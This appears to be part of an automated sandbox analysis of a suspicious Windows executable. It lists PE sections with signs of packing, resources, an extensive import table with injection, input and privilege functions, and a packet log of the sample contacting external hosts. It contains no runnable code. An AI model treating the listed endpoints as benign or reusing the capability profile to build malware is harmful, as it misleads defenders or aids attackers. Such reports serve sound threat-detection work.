Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	a9b73b76d244f177fa9d7f8d6a7d4ba2	False	0.5728679102422908	data	6.676127090218108	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x27f70	0x28000	cf94e7bb4726001ff5072195070f3eb5	False	0.835650634765625	data	7.645692491644237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xef000	0x96000	0x95000	5b73124c49229cc284c6e892ed245adf	False	0.9705409107592282	data	7.9204863406628485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1f237	data			1.0003606626784691
RT_GROUP_ICON	0xee9f0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xeea68	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xeea7c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xeea90	0x14	data	English	Great Britain	1.25
RT_VERSION	0xeeaa4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xeeb80	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:40:42.790458918 CET	49703	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:42.795424938 CET	80	49703	54.244.188.177	192.168.2.11
Jan 10, 2025 21:40:42.795497894 CET	49703	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:42.798125029 CET	49703	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:42.798156977 CET	49703	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:42.802956104 CET	80	49703	54.244.188.177	192.168.2.11
Jan 10, 2025 21:40:42.802968025 CET	80	49703	54.244.188.177	192.168.2.11
Jan 10, 2025 21:40:43.150589943 CET	49704	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:43.159796000 CET	80	49704	54.244.188.177	192.168.2.11
Jan 10, 2025 21:40:43.159868956 CET	49704	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:43.164129019 CET	49704	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:43.164148092 CET	49704	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:43.168947935 CET	80	49704	54.244.188.177	192.168.2.11
Jan 10, 2025 21:40:43.168961048 CET	80	49704	54.244.188.177	192.168.2.11
Jan 10, 2025 21:40:50.017003059 CET	49704	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:40:50.160923958 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:40:50.165903091 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:40:50.167638063 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:40:50.177288055 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:40:50.182554007 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:40:53.560585022 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:40:53.565746069 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:40:53.570606947 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:40:55.112729073 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:40:55.160825014 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:40:55.169018030 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:40:55.169074059 CET	443	49706	104.21.64.1	192.168.2.11
Jan 10, 2025 21:40:55.169150114 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:40:55.177479029 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:40:55.177522898 CET	443	49706	104.21.64.1	192.168.2.11
Jan 10, 2025 21:40:55.650257111 CET	443	49706	104.21.64.1	192.168.2.11
Jan 10, 2025 21:40:55.650351048 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:40:55.656003952 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:40:55.656030893 CET	443	49706	104.21.64.1	192.168.2.11
Jan 10, 2025 21:40:55.656420946 CET	443	49706	104.21.64.1	192.168.2.11
Jan 10, 2025 21:40:55.707686901 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:40:55.722836971 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:40:55.763341904 CET	443	49706	104.21.64.1	192.168.2.11
Jan 10, 2025 21:40:55.855232000 CET	443	49706	104.21.64.1	192.168.2.11
Jan 10, 2025 21:40:55.855303049 CET	443	49706	104.21.64.1	192.168.2.11
Jan 10, 2025 21:40:55.855413914 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:40:55.891876936 CET	49706	443	192.168.2.11	104.21.64.1
Jan 10, 2025 21:41:01.080146074 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:41:01.085164070 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:41:02.493897915 CET	80	49705	158.101.44.242	192.168.2.11
Jan 10, 2025 21:41:02.540229082 CET	49705	80	192.168.2.11	158.101.44.242
Jan 10, 2025 21:41:02.604643106 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:02.604693890 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:02.604763031 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:02.605897903 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:02.605910063 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:03.762895107 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:03.762978077 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:03.789438963 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:03.789463043 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:03.789827108 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:03.823100090 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:03.863337040 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:03.863573074 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:03.863586903 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:04.139394999 CET	80	49703	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:04.139602900 CET	49703	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:04.139602900 CET	49703	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:04.144479036 CET	80	49703	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:04.158685923 CET	49712	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:04.163547993 CET	80	49712	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:04.163671017 CET	49712	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:04.163836002 CET	49712	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:04.163865089 CET	49712	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:04.168608904 CET	80	49712	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:04.168618917 CET	80	49712	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:04.450917959 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:04.451008081 CET	443	49711	149.154.167.220	192.168.2.11
Jan 10, 2025 21:41:04.451086998 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:04.451709986 CET	49711	443	192.168.2.11	149.154.167.220
Jan 10, 2025 21:41:05.678448915 CET	49712	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:05.812196970 CET	49713	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:05.817214966 CET	80	49713	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:05.818454981 CET	49713	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:05.818629026 CET	49713	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:05.818687916 CET	49713	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:05.823427916 CET	80	49713	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:05.823462009 CET	80	49713	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:07.190619946 CET	80	49713	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:07.190725088 CET	80	49713	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:07.190804958 CET	49713	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:07.291613102 CET	49713	80	192.168.2.11	18.141.10.107
Jan 10, 2025 21:41:07.296416998 CET	80	49713	18.141.10.107	192.168.2.11
Jan 10, 2025 21:41:08.434799910 CET	49714	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:08.439754009 CET	80	49714	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:08.439924955 CET	49714	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:08.440536976 CET	49714	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:08.440536976 CET	49714	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:08.445373058 CET	80	49714	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:08.445405006 CET	80	49714	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:29.832492113 CET	80	49714	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:29.832592010 CET	49714	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:29.832695961 CET	49714	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:29.837511063 CET	80	49714	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:29.905929089 CET	49715	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:29.910712004 CET	80	49715	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:29.911034107 CET	49715	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:29.911083937 CET	49715	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:29.911083937 CET	49715	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:29.915874958 CET	80	49715	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:29.915890932 CET	80	49715	54.244.188.177	192.168.2.11
Jan 10, 2025 21:41:33.692593098 CET	49715	80	192.168.2.11	54.244.188.177
Jan 10, 2025 21:41:33.742449045 CET	49717	80	192.168.2.11	44.221.84.105
Jan 10, 2025 21:41:33.747297049 CET	80	49717	44.221.84.105	192.168.2.11
Jan 10, 2025 21:41:33.747379065 CET	49717	80	192.168.2.11	44.221.84.105
Jan 10, 2025 21:41:33.747525930 CET	49717	80	192.168.2.11	44.221.84.105
Jan 10, 2025 21:41:33.747538090 CET	49717	80	192.168.2.11	44.221.84.105
Jan 10, 2025 21:41:33.752342939 CET	80	49717	44.221.84.105	192.168.2.11
Jan 10, 2025 21:41:33.752360106 CET	80	49717	44.221.84.105	192.168.2.11
Jan 10, 2025 21:41:34.224201918 CET	80	49717	44.221.84.105	192.168.2.11
Jan 10, 2025 21:41:34.224478960 CET	80	49717	44.221.84.105	192.168.2.11
Jan 10, 2025 21:41:34.224591017 CET	49717	80	192.168.2.11	44.221.84.105
Jan 10, 2025 21:41:34.224710941 CET	49717	80	192.168.2.11	44.221.84.105
Jan 10, 2025 21:41:34.229521990 CET	80	49717	44.221.84.105	192.168.2.11
Jan 10, 2025 21:41:34.316467047 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:41:34.321388006 CET	80	49718	72.52.178.23	192.168.2.11
Jan 10, 2025 21:41:34.321537971 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:41:34.321671009 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:41:34.321671009 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:41:34.326600075 CET	80	49718	72.52.178.23	192.168.2.11
Jan 10, 2025 21:41:34.326632023 CET	80	49718	72.52.178.23	192.168.2.11
Jan 10, 2025 21:41:34.876637936 CET	80	49718	72.52.178.23	192.168.2.11
Jan 10, 2025 21:41:34.893744946 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:34.898724079 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:34.898925066 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:34.899106026 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:34.904206991 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:34.926738977 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:41:35.542201042 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542227983 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542279959 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542290926 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542303085 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542316914 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542349100 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.542349100 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.542372942 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542382002 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.542387009 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542401075 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542412996 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.542469978 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.542469978 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.547261953 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.547275066 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.547287941 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.547300100 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.547338009 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.547385931 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.547557116 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.598392963 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.628801107 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.628818989 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.628909111 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.740994930 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:41:35.741106987 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:41:35.746145010 CET	80	49718	72.52.178.23	192.168.2.11
Jan 10, 2025 21:41:35.746191978 CET	80	49718	72.52.178.23	192.168.2.11
Jan 10, 2025 21:41:35.889214993 CET	80	49718	72.52.178.23	192.168.2.11
Jan 10, 2025 21:41:35.890352011 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:35.895375013 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:35.942442894 CET	49718	80	192.168.2.11	72.52.178.23
Jan 10, 2025 21:41:36.190814018 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.190834999 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.190896988 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:36.191052914 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191095114 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191143036 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191169024 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191210032 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:36.191210032 CET	49719	80	192.168.2.11	13.248.148.254
Jan 10, 2025 21:41:36.191292048 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191374063 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191385984 CET	80	49719	13.248.148.254	192.168.2.11
Jan 10, 2025 21:41:36.191447020 CET	49719	80	192.168.2.11	13.248.148.254
